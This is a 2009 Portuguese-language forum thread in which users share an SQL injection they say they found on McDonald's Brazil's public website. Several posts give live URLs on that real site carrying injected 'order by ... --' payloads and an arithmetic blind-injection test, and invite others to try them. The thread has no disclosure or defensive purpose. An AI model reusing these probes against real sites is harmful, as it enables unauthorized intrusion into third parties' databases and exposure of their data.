SQL Injection no Mcdonalds encontrado por mim!

Started by Mago__, 06 de May , 2009, 08:16:48 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Mago__

#1
06 de May , 2009, 08:19:49 PM
Agora que vi que postei na seção errada. Perdão.

Reeves

#2
06 de May , 2009, 11:34:50 PM
Nenhum conteúdo foi localizado para a expressão "".  ???????????
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

Mago__

#3
07 de May , 2009, 08:19:16 AM
Reeves, isto ocorre pq coloquei cmbCategoria=-1. Por isso apareceu [Nenhum conteúdo foi localizado para a expressão "". ]

E só coloquei algo que mostre o SQL Injection. Experimente http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=-1%20order%20by%204%20-- e verá o SQL Injection.

http://www.mcdonalds.com.br/mulher/entre_amigas_home.asp?cod=20%20order%20by%201%20-- Esta página também é vulnerável.

Enfim.

Wuefez

#5
28 de May , 2009, 02:16:24 PM
Realmente... Site do McDonalds ta super vulneravel......

Vejam bem:

cmbCategoria sendo passado como 3, retorna essa página...

http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=3

se a gente passar o cmbCategoria como 4-1:

http://www.mcdonalds.com.br/institucional/perguntas_frequentes_resultado.asp?cmbCategoria=4-1

ele ainda retorna a mesma pagina... pois 4 menos 1 é igual a 3....

Blind inject até onde eu sei continua sendo SQL inject........ ehhueuhehueeuheuheh


"Quem fala não faz."
Print
Go Up Pages1
User actions